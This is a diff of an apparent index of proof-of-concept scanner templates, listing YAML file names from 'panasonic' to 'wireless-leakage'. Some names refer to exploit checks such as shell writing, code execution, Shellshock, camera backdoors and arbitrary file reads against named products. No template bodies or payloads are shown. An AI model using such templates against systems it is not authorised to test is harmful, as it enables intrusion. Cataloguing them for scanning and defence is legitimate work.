./poc/other/panasonic-maintenance-utility.yaml
./poc/other/panasonic-network-management-9446.yaml
-./poc/other/panasonic-network-management-9447.yaml
+./poc/other/panasonic-network-management-9448.yaml
./poc/other/panasonic-network-management-9449.yaml
./poc/other/panasonic-network-management-9450.yaml
./poc/other/panda-pods-repeater-field-f8e576736f5c337207c9a8ede1b72e55.yaml
@@ -71257,6 +71226,7 @@
./poc/other/partdo-core-063ec1d04fd842700414b0ad7c1028af.yaml
./poc/other/partdo-core.yaml
./poc/other/partdo.yaml
+./poc/other/passbolt-panel.yaml
./poc/other/past-events-extension-76c6b84ccd9f6bd60eada03675ff7bce.yaml
./poc/other/past-events-extension-b7c5fef4e19b4435bd19c7ddc442fdea.yaml
./poc/other/past-events-extension-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -71394,6 +71364,7 @@
./poc/other/pdf.yaml
./poc/other/pdf24-post-to-pdf.yaml
./poc/other/pdf24-posts-to-pdf.yaml
+./poc/other/pdi-device-page.yaml
./poc/other/pdq-csv-01b678a59c250be17cfe85410e02fd6d.yaml
./poc/other/pdq-csv.yaml
./poc/other/pdw-file-browser-17fa95239468ce8080ab8af783bf4887.yaml
@@ -71421,8 +71392,8 @@
./poc/other/pegarules.yaml
./poc/other/penci-data-migrator.yaml
./poc/other/pendo.yaml
+./poc/other/pentaho-panel-9481.yaml
./poc/other/pentaho-panel-9482.yaml
-./poc/other/pentaho-panel-9483.yaml
./poc/other/pentaho-panel.yaml
./poc/other/pentaho-workflow.yaml
./poc/other/pepro-ultimate-invoice-415bafee9b870aaa5ec705656e9ae7f8.yaml
@@ -71784,6 +71755,7 @@
./poc/other/plausible-analytics-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/plausible-analytics-plugin.yaml
./poc/other/plausible-analytics.yaml
+./poc/other/plausible-panel.yaml
./poc/other/play-ht-3c219350e35b8705870cb2eb15af2d3b.yaml
./poc/other/play-ht-47b573c976893fe184436d253e8fb414.yaml
./poc/other/play-ht-fde423113abea7735d1cebd7bbaa88d4.yaml
@@ -71809,19 +71781,18 @@
./poc/other/pldsec-统一安全管理和综合审计系统.yaml
./poc/other/plerdy-heatmap-b0bd4af414ed0c61a6b55b28713a79bc.yaml
./poc/other/plerdy-heatmap.yaml
-./poc/other/plesk-obsidian-9594.yaml
./poc/other/plesk-obsidian-9595.yaml
./poc/other/plesk-obsidian-9596.yaml
./poc/other/plesk-obsidian-9597.yaml
./poc/other/plesk-obsidian.yaml
-./poc/other/plesk-onyx-9598.yaml
./poc/other/plesk-onyx-9599.yaml
./poc/other/plesk-onyx-9600.yaml
+./poc/other/plesk-onyx-9601.yaml
./poc/other/plesk-onyx.yaml
./poc/other/plesk-plesk-onyx.yaml
./poc/other/plesk-stat-9602.yaml
./poc/other/plesk-stat-9603.yaml
-./poc/other/plesk-stat-9604.yaml
+./poc/other/plesk-stat.yaml
./poc/other/plezi-4a80cd5a954b8f2bb72aeed6f12b185b.yaml
./poc/other/plezi.yaml
./poc/other/plg_novana-1c2cea013210e5c90b176a13485e2663.yaml
@@ -71846,6 +71817,7 @@
./poc/other/plugin-logic.yaml
./poc/other/plugin-newsletter-e40581f611ffe73a6f20ba9a12cd0a0d.yaml
./poc/other/plugin-newsletter.yaml
+./poc/other/plugin.yaml
./poc/other/plugins-list-b73d4af128c6eea440ef7c3187315bc8.yaml
./poc/other/plugins-list-f0270b9471517b9d996fdf18e804bc95.yaml
./poc/other/plugins-list.yaml
@@ -72106,10 +72078,10 @@
./poc/other/popups.yaml
./poc/other/portainer-init-deploy-9628.yaml
./poc/other/portainer-init-deploy-9629.yaml
-./poc/other/portainer-init-deploy-9630.yaml
./poc/other/portainer-init-deploy-9631.yaml
./poc/other/portainer-init-deploy-9632.yaml
./poc/other/portainer-init-deploy-9633.yaml
+./poc/other/portainer-init-deploy.yaml
./poc/other/portainer-panel.yaml
./poc/other/portainer.yaml
./poc/other/portfolio-82a29985ba6c170976940ebd73e10b7d.yaml
@@ -72352,7 +72324,6 @@
./poc/other/post-views.yaml
./poc/other/postaffiliatepro-9ed24bf70201233fb5c59de83955e65e.yaml
./poc/other/postaffiliatepro.yaml
-./poc/other/posteio-admin-panel.yaml
./poc/other/posterous.yaml
./poc/other/posthog-admin-panel.yaml
./poc/other/postie-37af4fad5c12509e72c1ef2660c11a10.yaml
@@ -72375,9 +72346,9 @@
./poc/other/postmatic-bae291c7c3485f8a23c0bba03494b780.yaml
./poc/other/postmatic-c5364a6d911d0e930680d39522fc7662.yaml
./poc/other/postmatic.yaml
-./poc/other/postmessage-outgoing-tracker-9634.yaml
./poc/other/postmessage-outgoing-tracker-9635.yaml
./poc/other/postmessage-outgoing-tracker-9636.yaml
+./poc/other/postmessage-outgoing-tracker.yaml
./poc/other/postmessage-tracker-9637.yaml
./poc/other/postmessage-tracker-9638.yaml
./poc/other/postmessage-tracker-9639.yaml
@@ -72423,8 +72394,8 @@
./poc/other/powerkit-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/powerkit-plugin.yaml
./poc/other/powerkit.yaml
-./poc/other/powerlogic-ion-9648.yaml
./poc/other/powerlogic-ion-9649.yaml
+./poc/other/powerlogic-ion-9650.yaml
./poc/other/powerlogic-ion.yaml
./poc/other/powermta.yaml
./poc/other/powerpack-addon-for-beaver-builder-2deab7296758bc872a1e7e3e3fb52e28.yaml
@@ -72798,14 +72769,14 @@
./poc/other/prolist-theme.yaml
./poc/other/prolist.yaml
./poc/other/promail.yaml
-./poc/other/prometheus-exporter-9678.yaml
+./poc/other/prometheus-exporter-9677.yaml
+./poc/other/prometheus-exporter.yaml
+./poc/other/prometheus-flags-9687.yaml
./poc/other/prometheus-flags-endpoint-9685.yaml
./poc/other/prometheus-flags-endpoint-9686.yaml
./poc/other/prometheus-flags-endpoint.yaml
-./poc/other/prometheus-flags.yaml
./poc/other/prometheus-log.yaml
./poc/other/prometheus-targets-9690.yaml
-./poc/other/prometheus-targets-9691.yaml
./poc/other/prometheus-targets-9692.yaml
./poc/other/prometheus-targets-endpoint-9688.yaml
./poc/other/prometheus-targets-endpoint-9689.yaml
@@ -72860,10 +72831,10 @@
./poc/other/protected-posts-logout-button.yaml
./poc/other/proton-phish.yaml
./poc/other/prototype-pollution-check-9697.yaml
-./poc/other/prototype-pollution-check-9699.yaml
+./poc/other/prototype-pollution-check-9698.yaml
./poc/other/prototype-pollution-check.yaml
./poc/other/provider-path-9700.yaml
-./poc/other/provider-path-9702.yaml
+./poc/other/provider-path-9701.yaml
./poc/other/provider-path.yaml
./poc/other/proxmox-panel.yaml
./poc/other/proxmox-ve.yaml
@@ -72876,6 +72847,7 @@
./poc/other/pt-elementor-addons-lite-plugin.yaml
./poc/other/pt-elementor-addons-lite.yaml
./poc/other/ptr-fingerprint-9707.yaml
+./poc/other/ptr-fingerprint.yaml
./poc/other/ptypeconverter-de0336e587f9f6b9a860440eebc3c601.yaml
./poc/other/ptypeconverter.yaml
./poc/other/public-documents.yaml
@@ -72903,6 +72875,7 @@
./poc/other/pulsar-admin-console.yaml
./poc/other/pulsar-adminui-panel.yaml
./poc/other/pulsar360-admin-panel.yaml
+./poc/other/pulse-secure-panel-9712.yaml
./poc/other/pulse-secure-panel-9713.yaml
./poc/other/pulse-secure-panel-9714.yaml
./poc/other/pulse-secure-panel-9715.yaml
@@ -72936,10 +72909,9 @@
./poc/other/push-notification-for-post-and-buddypress-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/push-notification-for-post-and-buddypress-plugin.yaml
./poc/other/push-notification-for-post-and-buddypress.yaml
-./poc/other/put-m-enb.yaml
./poc/other/put-method-enabled-9726.yaml
+./poc/other/put-method-enabled-9727.yaml
./poc/other/put-method-enabled-9728.yaml
-./poc/other/put-method-enabled.yaml
./poc/other/putMethod-1.yaml
./poc/other/putMethod-2.yaml
./poc/other/putmethod-1.yaml
@@ -72951,6 +72923,7 @@
./poc/other/py_settings.yaml
./poc/other/pygopherd.yaml
./poc/other/pyload-panel.yaml
+./poc/other/pypicloud-panel-9733.yaml
./poc/other/pypicloud-panel-9734.yaml
./poc/other/pypicloud-panel.yaml
./poc/other/pypiserver.yaml
@@ -72991,7 +72964,9 @@
./poc/other/qdpm-info-leak-9750.yaml
./poc/other/qdpm-info-leak-9751.yaml
./poc/other/qdpm-info-leak-9752.yaml
+./poc/other/qdpm-info-leak-9753.yaml
./poc/other/qdpm-info-leak-9754.yaml
+./poc/other/qdpm-info-leak.yaml
./poc/other/qe-seo-handyman-41cf2b5091a855715a41f6fd63cde04c.yaml
./poc/other/qe-seo-handyman-478c02c6c55f7c262f68d1ab8607d6af.yaml
./poc/other/qe-seo-handyman.yaml
@@ -73267,7 +73242,7 @@
./poc/other/r-seenet-workflow.yaml
./poc/other/rabbit-loader-c82cb72a96a7e8a44e3fa4554cd33e13.yaml
./poc/other/rabbit-loader.yaml
-./poc/other/race-multiple.yaml
+./poc/other/race-simple.yaml
./poc/other/rack-mini-profiler-9788.yaml
./poc/other/rack-mini-profiler-9789.yaml
./poc/other/rack-mini-profiler-9790.yaml
@@ -73297,8 +73272,8 @@
./poc/other/radius-manager-2.yaml
./poc/other/radius-manager-3.yaml
./poc/other/radius-manager-4.yaml
+./poc/other/radius-manager-9794.yaml
./poc/other/radius-manager-9795.yaml
-./poc/other/radius-manager-9796.yaml
./poc/other/radius-manager.yaml
./poc/other/radware-appwall.yaml
./poc/other/radykal-fancy-gallery-45e420ead424144a445b4de1d53ba71a.yaml
@@ -73379,6 +73354,7 @@
./poc/other/ravpage-b5a51590524092b47fea1bc58ca48251.yaml
./poc/other/ravpage.yaml
./poc/other/raw-get-query.yaml
+./poc/other/raw-get.yaml
./poc/other/raw-path-trailing-slash.yaml
./poc/other/raw-payload.yaml
./poc/other/raw-post-body.yaml
@@ -73616,6 +73592,7 @@
./poc/other/recommended-products-edd-ff5c5c08fe6c05ca7e401ff36575ed62.yaml
./poc/other/recommended-products-edd.yaml
./poc/other/recommended.yml
+./poc/other/red-lion-panel.yaml
./poc/other/redash-installer.yaml
./poc/other/redash-panel.yaml
./poc/other/redcap-install-module(1).yaml
@@ -73806,7 +73783,8 @@
./poc/other/request-a-quote-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/request-a-quote-plugin.yaml
./poc/other/request-a-quote.yaml
-./poc/other/request-based-interaction-9863.yaml
+./poc/other/request-based-interaction-9862.yaml
+./poc/other/request-based-interaction.yaml
./poc/other/request-condition-new.yaml
./poc/other/request-condition.yaml
./poc/other/require-taxonomy-image-category-tag-3e080442bb85e7ac2ae95bab3a10f941.yaml
@@ -73843,14 +73821,15 @@
./poc/other/resim-ara-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/resim-ara-plugin.yaml
./poc/other/resim-ara.yaml
-./poc/other/resin-inputfile-fileread-9868.yaml
./poc/other/resin-inputfile-fileread-9869.yaml
+./poc/other/resin-inputfile-fileread-9870.yaml
./poc/other/resin-inputfile-fileread-9871.yaml
./poc/other/resin-viewfile-fileread.yaml
./poc/other/resin-viewfile-fileread.yml
./poc/other/resin-viewfile-lfr-9872.yaml
./poc/other/resin-viewfile-lfr-9873.yaml
./poc/other/resin-viewfile-lfr-9875.yaml
+./poc/other/resin-viewfile-lfr.yaml
./poc/other/resmushit-image-optimizer-55e816cb631a172f3433d28be371bf4d.yaml
./poc/other/resmushit-image-optimizer-8e138d835c51d3c6720b941fe121d84e.yaml
./poc/other/resmushit-image-optimizer-949bb7e530ea361fdff18bd3807a94ad.yaml
@@ -74206,7 +74185,7 @@
./poc/other/robots-9887.yaml
./poc/other/robots-9889.yaml
./poc/other/robots-txt-9886.yaml
-./poc/other/robots-txt-9890.yaml
+./poc/other/robots-txt-9888.yaml
./poc/other/robots-txt-endpoint.yaml
./poc/other/robots-txt.yaml
./poc/other/robots.txt.yaml
@@ -74405,6 +74384,7 @@
./poc/other/ruijie-cloud.yaml
./poc/other/ruijie-eg-file-read.yaml
./poc/other/ruijie-eg-file-read.yml
+./poc/other/ruijie-eg-filedown.yaml
./poc/other/ruijie-eg-info-leak.yml
./poc/other/ruijie-eg易网关.yaml
./poc/other/ruijie-it.yaml
@@ -74700,7 +74680,7 @@
./poc/other/scrollsequence.yaml
./poc/other/scs-landfill-control-10095.yaml
./poc/other/scs-landfill-control-10096.yaml
-./poc/other/scs-landfill-control-10098.yaml
+./poc/other/scs-landfill-control-10097.yaml
./poc/other/scs-landfill-control.yaml
./poc/other/scv1-119cdc16fe916df3add67c8763d4fc01.yaml
./poc/other/scv1-31fa1f0e3c61b1f050d66cb517e56e41.yaml
@@ -74767,13 +74747,13 @@
./poc/other/secure-html5-video-player.yaml
./poc/other/securemoz-security-audit-5934c9784ef1b47d3135045450f457ae.yaml
./poc/other/securemoz-security-audit.yaml
-./poc/other/securenvoy-panel-10114.yaml
./poc/other/securenvoy-panel-10115.yaml
+./poc/other/securenvoy-panel-10116.yaml
./poc/other/securenvoy-panel.yaml
-./poc/other/securepoint-utm-10117.yaml
+./poc/other/securepoint-utm-10118.yaml
./poc/other/securepoint-utm.yaml
./poc/other/security-10122.yaml
-./poc/other/security-10123.yaml
+./poc/other/security-10124.yaml
./poc/other/security-intelligent-management-platform.yaml
./poc/other/security-malware-firewall-45c526c3982a209b165f42c75f6d6d27.yaml
./poc/other/security-malware-firewall-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -74809,7 +74789,6 @@
./poc/other/selea-ip-camera-10133.yaml
./poc/other/selea-ip-camera-10134.yaml
./poc/other/selea-ip-camera-10135.yaml
-./poc/other/selea-ip-camera-10136.yaml
./poc/other/selea-ip-camera.yaml
./poc/other/selea-targa-camera-read-file.yaml
./poc/other/select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons-eca8b18a10526011571b2fa3e9fc94f6.yaml
@@ -74820,6 +74799,7 @@
./poc/other/self-contained.yaml
./poc/other/self-signed-cert.yaml
./poc/other/self-signed-ssl.yaml
+./poc/other/selfcheck-panel.yaml
./poc/other/selio-47217d68dcdf61df30873286a6bbc681.yaml
./poc/other/selio-4a816a5156ab7c9cc5ec9ab45afebe2d.yaml
./poc/other/selio-5ace739a5952774d63f1bf788e169f28.yaml
@@ -75040,7 +75020,7 @@
./poc/other/server-status-by-hostnameip.yaml
./poc/other/server-status-localhost-10163.yaml
./poc/other/server-status-localhost-10164.yaml
-./poc/other/server-status-localhost-10165.yaml
+./poc/other/server-status-localhost-10166.yaml
./poc/other/server-status-localhost.yaml
./poc/other/servfail-refused-hosts-10167.yaml
./poc/other/servfail-refused-hosts-10168.yaml
@@ -75166,9 +75146,9 @@
./poc/other/shell-history-1.yaml
./poc/other/shell-history-10191.yaml
./poc/other/shell-history-10192.yaml
-./poc/other/shell-history-10193.yaml
./poc/other/shell-history-2.yaml
./poc/other/shell-history-3.yaml
+./poc/other/shell-history.yaml
./poc/other/shell_scripts.yaml
./poc/other/shells.yaml
./poc/other/shellscripts-1.yaml
@@ -75392,10 +75372,10 @@
./poc/other/sidebar-manager.yaml
./poc/other/sideblog-de06c6cd776a8d198247303108ff7a16.yaml
./poc/other/sideblog.yaml
-./poc/other/sidekiq-dashboard-10235.yaml
./poc/other/sidekiq-dashboard-10236.yaml
./poc/other/sidekiq-dashboard-10237.yaml
./poc/other/sidekiq-dashboard-10238.yaml
+./poc/other/sidekiq-dashboard-10239.yaml
./poc/other/sidekiq-dashboard.yaml
./poc/other/sidekiq-workflow.yaml
./poc/other/signal-phish.yaml
@@ -75428,6 +75408,7 @@
./poc/other/signatures-10265.yaml
./poc/other/signatures-10266.yaml
./poc/other/signatures-10267.yaml
+./poc/other/signatures-10268.yaml
./poc/other/signatures-10269.yaml
./poc/other/signatures-10270.yaml
./poc/other/signatures.yaml
@@ -75970,7 +75951,6 @@
./poc/other/sitemap-by-click5-bb55523a8065ab01450d6332a0f9b83d.yaml
./poc/other/sitemap-by-click5.yaml
./poc/other/sitemap-index.yaml
-./poc/other/sitemap.yaml
./poc/other/siteminderagent.yaml
./poc/other/siteorigin-panels-0c18557898a1d94d25aeb04bcb7e7891.yaml
./poc/other/siteorigin-panels-20b6552057669c22e92f742a513eab73.yaml
@@ -76006,8 +75986,8 @@
./poc/other/sky-elementor-addons-a77d646b0ca65be83cef4a1196433a63.yaml
./poc/other/sky-elementor-addons.yaml
./poc/other/sky-phish.yaml
-./poc/other/skycaiji-admin-panel-10304.yaml
./poc/other/skycaiji-admin-panel-10305.yaml
+./poc/other/skycaiji-admin-panel-10306.yaml
./poc/other/skycaiji-admin-panel.yaml
./poc/other/skycaiji-install-10308.yaml
./poc/other/skycaiji-install-10309.yaml
@@ -76342,7 +76322,6 @@
./poc/other/soft78-system.yaml
./poc/other/softbiz-online-auctions-script.yaml
./poc/other/softbiz-online-classifieds.yaml
-./poc/other/softether-vpn-panel.yaml
./poc/other/softether-vpn.yaml
./poc/other/softnext-spam-sqr反垃圾邮件系统.yaml
./poc/other/softnext-spam.yaml
@@ -76367,8 +76346,8 @@
./poc/other/solarview-compact-panel.yaml
./poc/other/solarview-compact.yaml
./poc/other/solarwinds-arm-panel.yaml
+./poc/other/solarwinds-orion-10357.yaml
./poc/other/solarwinds-orion-10358.yaml
-./poc/other/solarwinds-orion-10359.yaml
./poc/other/solarwinds-orion-panel.yaml
./poc/other/solarwinds-orion-workflow.yaml
./poc/other/solarwinds-orion.yaml
@@ -76393,18 +76372,19 @@
./poc/other/solr-admin-query.yaml
./poc/other/solr-file-read.yaml
./poc/other/solr-fileRead.yaml
+./poc/other/solr-fileread.yaml
./poc/other/solr-fileread.yml
./poc/other/solr-query-dashboard-1.yaml
./poc/other/solr-query-dashboard-10367.yaml
+./poc/other/solr-query-dashboard-10368.yaml
./poc/other/solr-query-dashboard-10369.yaml
./poc/other/solr-query-dashboard-10370.yaml
./poc/other/solr-query-dashboard-2.yaml
-./poc/other/solr-query-dashboard.yaml
./poc/other/solr-workflow.yaml
./poc/other/some-PIIs.yaml
./poc/other/sonarcloud.yaml
+./poc/other/sonarqube-public-projects-10377.yaml
./poc/other/sonarqube-public-projects-10378.yaml
-./poc/other/sonarqube-public-projects-10379.yaml
./poc/other/sonarqube-public-projects.yaml
./poc/other/sonarqube-workflow.yaml
./poc/other/sonarqube.yaml
@@ -76414,13 +76394,14 @@
./poc/other/sonicwall-management-panel.yaml
./poc/other/sonicwall-shellshock-vulnerability.yaml
./poc/other/sonicwall-ssl-vpn.yaml
+./poc/other/sonicwall-sslvpn-panel-10388.yaml
./poc/other/sonicwall-sslvpn-panel-10389.yaml
-./poc/other/sonicwall-sslvpn-panel-10390.yaml
./poc/other/sonicwall-sslvpn-panel.yaml
./poc/other/sonicwall-sslvpn-shellshock-10391.yaml
./poc/other/sonicwall-sslvpn-shellshock-10392.yaml
./poc/other/sonicwall-sslvpn-shellshock-10393.yaml
./poc/other/sonicwall-sslvpn-shellshock-10394.yaml
+./poc/other/sonicwall-sslvpn-shellshock-10395.yaml
./poc/other/sony-camera-backdoor.yaml
./poc/other/sony-liv.yaml
./poc/other/sophi-4afed2941162d2b455634089bfa7fe66.yaml
@@ -76582,6 +76563,7 @@
./poc/other/speedycache-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/speedycache-plugin.yaml
./poc/other/speedycache.yaml
+./poc/other/sphinxonline-panel.yaml
./poc/other/spice-post-slider-347b7b133c5bc03f847b0cc6cd76824f.yaml
./poc/other/spice-post-slider.yaml
./poc/other/spice-software-157cf14a019f2f39567d396451ba436d.yaml
@@ -76619,7 +76601,6 @@
./poc/other/spideranalyse.yaml
./poc/other/spidercontrol-scada-server-info-10411.yaml
./poc/other/spidercontrol-scada-server-info-10412.yaml
-./poc/other/spidercontrol-scada-server-info-10413.yaml
./poc/other/spidercontrol-scada-server-info.yaml
./poc/other/spiderfoot.yaml
./poc/other/spidermag-236bed5b5a49a6173251e991d6ca44d1.yaml
@@ -76658,7 +76639,6 @@
./poc/other/split-test-for-elementor-bde4325200fb2f444fb8a10edf1336f9.yaml
./poc/other/split-test-for-elementor.yaml
./poc/other/splunk-enterprise-panel-10414.yaml
-./poc/other/splunk-enterprise-panel-10415.yaml
./poc/other/splunk-enterprise-panel.yaml
./poc/other/splunk-workflow.yaml
./poc/other/splunk.yaml
@@ -76669,7 +76649,7 @@
./poc/other/sponsors-carousel-41040133b76cc5bfa7e90c541b024423.yaml
./poc/other/sponsors-carousel.yaml
./poc/other/spoofable-mail-missingdmarc.yaml
-./poc/other/spoofable-spf-records-ptr-10425.yaml
+./poc/other/spoofable-spf-records-ptr-10424.yaml
./poc/other/spoofable-spf-records-ptr-10426.yaml
./poc/other/spoofable-spf-records-ptr-10427.yaml
./poc/other/sportspress-ae19df4693862355cf869714c073d0eb.yaml
@@ -77210,12 +77190,10 @@
./poc/other/supermap-iserver.yaml
./poc/other/supermicro-bmc-panel-old.yaml
./poc/other/supermicro-bmc-panel.yaml
-./poc/other/supershell-c2.yaml
./poc/other/superv-meeting.yaml
./poc/other/supervisord.yaml
./poc/other/supervpn-panel-10575.yaml
./poc/other/supervpn-panel-10576.yaml
-./poc/other/supervpn-panel-10577.yaml
./poc/other/supervpn-panel.yaml
./poc/other/support-genix-lite-64c576dc3e88ee994a3bf9f765a979d3.yaml
./poc/other/support-genix-lite.yaml
@@ -77383,7 +77361,7 @@
./poc/other/symantec-messaging-gateway-10607.yaml
./poc/other/symantec-messaging-gateway-10608.yaml
./poc/other/symantec-messaging-gateway-10609.yaml
-./poc/other/symantec-messaging-gateway-10610.yaml
+./poc/other/symantec-pgp-global-directory-10611.yaml
./poc/other/symantec-pgp-global-directory-10612.yaml
./poc/other/symantec-pgp-global-directory-10613.yaml
./poc/other/symantec-pgp-global-directory.yaml
@@ -77426,7 +77404,6 @@
./poc/other/synology-diskstation-nas.yaml
./poc/other/synology-photo-station.yaml
./poc/other/synology-router-manager.yaml
-./poc/other/synopsys-coverity-panel.yaml
./poc/other/syntax-checking-10633.yaml
./poc/other/syntax-checking-10634.yaml
./poc/other/syntax-checking.yaml
@@ -77484,6 +77461,7 @@
./poc/other/tablesome-dc53a007f160e75fd224d604cb3a0711.yaml
./poc/other/tablesome.yaml
./poc/other/tabnabbing-check-10645.yaml
+./poc/other/tabnabbing-check-10646.yaml
./poc/other/tabnabbing-check.yaml
./poc/other/taboola-5cde13fe6662d7d9b24cd4265d596789.yaml
./poc/other/taboola.yaml
@@ -77606,8 +77584,9 @@
./poc/other/team-showcase-supreme.yaml
./poc/other/team-showcase.yaml
./poc/other/team.yaml
-./poc/other/teamcity-registration-enabled-10667.yaml
+./poc/other/teamcity-registration-enabled.yaml
./poc/other/teamdoc-filesystem.yaml
+./poc/other/teamforge-panel.yaml
./poc/other/teampass-panel.yaml
./poc/other/teamviewer-phish.yaml
./poc/other/teamviewer.yaml
@@ -77627,6 +77606,7 @@
./poc/other/tectuus-scada-monitor-10682.yaml
./poc/other/tectuus-scada-monitor.yaml
./poc/other/tekon-info-leak-10684.yaml
+./poc/other/tekon-info-leak-10685.yaml
./poc/other/tekton-dashboard.yaml
./poc/other/telefication-1c7925e1a8107c9a8d402138b26021c6.yaml
./poc/other/telefication.yaml
@@ -77701,13 +77681,12 @@
./poc/other/teradici-pcoip-10704.yaml
./poc/other/teradici-pcoip-panel.yaml
./poc/other/teradici-pcoip-zero-client.yaml
-./poc/other/teradici-pcoip.yaml
./poc/other/terillion-reviews-b491b4d5351fea9f098fb4edcecd04c9.yaml
./poc/other/terillion-reviews.yaml
./poc/other/terminal-feature-collection-and-control-system.yaml
./poc/other/terraclassifieds-535145ab999d35b4feced2028968ea53.yaml
./poc/other/terraclassifieds.yaml
-./poc/other/terraform-enterprise-panel-10710.yaml
+./poc/other/terraform-enterprise-panel-10711.yaml
./poc/other/terraform-enterprise-panel-10712.yaml
./poc/other/terraform-enterprise-panel.yaml
./poc/other/terramaster-workflow.yaml
@@ -78038,15 +78017,14 @@
./poc/other/thinkadmin-workflow.yaml
./poc/other/thinkadmin.yaml
./poc/other/thinkcmf-arbitary.yaml
-./poc/other/thinkcmf-arbitrary-code-execution-10715.yaml
./poc/other/thinkcmf-arbitrary-code-execution-10716.yaml
+./poc/other/thinkcmf-arbitrary-code-execution.yaml
./poc/other/thinkcmf-file-include.yaml
./poc/other/thinkcmf-workflow-10730.yaml
./poc/other/thinkcmf-workflow-10731.yaml
./poc/other/thinkcmf-write-shell.yaml
./poc/other/thinkcmf-write-shell.yml
./poc/other/thinkcmf.yaml
-./poc/other/thinkcmf_include.yaml
./poc/other/thinker-intelligentgateway.yaml
./poc/other/thinkmail.yaml
./poc/other/thinkox.yaml
@@ -78129,6 +78107,7 @@
./poc/other/tianqing-info-leak.yaml
./poc/other/tianqing-info-leak.yml
./poc/other/tianyang-bpm-system.yaml
+./poc/other/tibco-spotfire-panel.yaml
./poc/other/ticker-ultimate-7851c267c5129958224bd7b0d064e1e0.yaml
./poc/other/ticker-ultimate.yaml
./poc/other/tickera-event-ticketing-system-0e2339661545e817b8840235d57493ae.yaml
@@ -78159,6 +78138,7 @@
./poc/other/tiempocom.yaml
./poc/other/tier-pricing-table-2eb2ad93209e7797221e4672f0518887.yaml
./poc/other/tier-pricing-table.yaml
+./poc/other/tigase-xmpp-server.yaml
./poc/other/tiger-form-a9c7778b2c1fe12201c4414e46e5cfe7.yaml
./poc/other/tiger-form.yaml
./poc/other/tiger-ip-connect.yaml
@@ -78171,6 +78151,7 @@
./poc/other/tileserver-gl-10785.yaml
./poc/other/tileserver-gl-10786.yaml
./poc/other/tileserver-gl-10787.yaml
+./poc/other/tileserver-gl.yaml
./poc/other/timber-library-63f508e564b8a4abe97afab9c4153993.yaml
./poc/other/timber-library.yaml
./poc/other/time-sheets-01c399115e5a14d0d02b21cc32dc4267.yaml
@@ -78356,7 +78337,6 @@
./poc/other/topsec-vpn.yaml
./poc/other/topwalk-mtp.yaml
./poc/other/tor-socks-proxy-10810.yaml
-./poc/other/tor-socks-proxy-10811.yaml
./poc/other/tor-socks-proxy-10812.yaml
./poc/other/tor-socks-proxy-10813.yaml
./poc/other/tor-socks-proxy.yaml
@@ -78447,8 +78427,8 @@
./poc/other/tradetracker-store.yaml
./poc/other/trading212-phish.yaml
./poc/other/tradingeye.yaml
-./poc/other/traefik-dashboard-10832.yaml
./poc/other/traefik-dashboard-10833.yaml
+./poc/other/traefik-dashboard-10834.yaml
./poc/other/traefik-dashboard.yaml
./poc/other/traefik-workflow.yaml
./poc/other/traefik.yaml
@@ -78622,9 +78602,9 @@
./poc/other/tutor-pro.yaml
./poc/other/tutor.yaml
./poc/other/tutortrac.yaml
+./poc/other/tuxedo-connected-controller-10852.yaml
./poc/other/tuxedo-connected-controller-10853.yaml
./poc/other/tuxedo-connected-controller-10854.yaml
-./poc/other/tuxedo-connected-controller-10855.yaml
./poc/other/tuxedo-connected-controller.yaml
./poc/other/twchat-1e11041979895de79516b21f580cfdc5.yaml
./poc/other/twchat-66860598cfdc267acba6e015a017bc01.yaml
@@ -79299,12 +79279,11 @@
./poc/other/upfiv-complete-all-in-one-seo-wizard.yaml
./poc/other/upnp-device-10980.yaml
./poc/other/upnp-device-10981.yaml
-./poc/other/upnp-device-10982.yaml
./poc/other/upnp-device.yaml
./poc/other/uportal.yaml
./poc/other/ups-status-1.yaml
-./poc/other/ups-status-10983.yaml
./poc/other/ups-status-10984.yaml
+./poc/other/ups-status-10985.yaml
./poc/other/ups-status-2.yaml
./poc/other/upscale-179320c05c6c92e9b26b9cab26bf1bc3.yaml
./poc/other/upscale-8525917b8f35bb4eaf3e210e14fd7fa5.yaml
@@ -79719,7 +79698,6 @@
./poc/other/verge3d.yaml
./poc/other/verification-code-for-comments-402d5d368961e0883801cefc4dd8562b.yaml
./poc/other/verification-code-for-comments.yaml
-./poc/other/veriz0wn-osint.yaml
./poc/other/verizon-router-panel.yaml
./poc/other/vernemq-status-page.yaml
./poc/other/vernemq-status.yaml
@@ -80086,8 +80064,7 @@
./poc/other/void-elementor-whmcs-elements-15e54a1af569e89032ac0ee0b704f8b0.yaml
./poc/other/void-elementor-whmcs-elements.yaml
./poc/other/voipmonitor-panel.yaml
-./poc/other/voipmonitor-workflow-11065.yaml
-./poc/other/voipmonitor-workflow.yaml
+./poc/other/voipmonitor-workflow-11064.yaml
./poc/other/vop.yaml
./poc/other/vos-vos2009.yaml
./poc/other/votecount-for-balatarin-c9ee335a6e160eeeadce2a3c276f2f36.yaml
@@ -80235,7 +80212,7 @@
./poc/other/walk-score.yaml
./poc/other/walker-core-c9d28ba9af7ff1cee52a47de51a62b8e.yaml
./poc/other/walker-core.yaml
-./poc/other/wallix-accessmanager-panel-11094.yaml
+./poc/other/wallix-accessmanager-panel-11095.yaml
./poc/other/wallix-accessmanager-panel.yaml
./poc/other/wallstreet-157cf14a019f2f39567d396451ba436d.yaml
./poc/other/wallstreet-7cccc28e1315b459e8b12f665a5d26e3.yaml
@@ -80325,7 +80302,7 @@
./poc/other/wavetop-days.yaml
./poc/other/wayos-panel.yaml
./poc/other/wayos维盟ac集中管理系统.yaml
-./poc/other/wazuh-panel-11113.yaml
+./poc/other/wazuh-panel-11114.yaml
./poc/other/wazuh-panel.yaml
./poc/other/wbcom-designs-buddypress-ads-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/wbcom-designs-buddypress-ads-edc227605cbf113bcdfd09c53dfc5da4.yaml
@@ -80699,7 +80676,7 @@
./poc/other/winterlock.yaml
./poc/other/winters.yaml
./poc/other/wireless-access-point-controller.yaml
-./poc/other/wireless-leakage(1).yaml
+./poc/other/wireless-leakage.yaml
./poc/other/wise-361b4625da00651d196bf168b5902896.yaml
./poc/other/wise-9099a88f255af571eb05254581f8054d.yaml
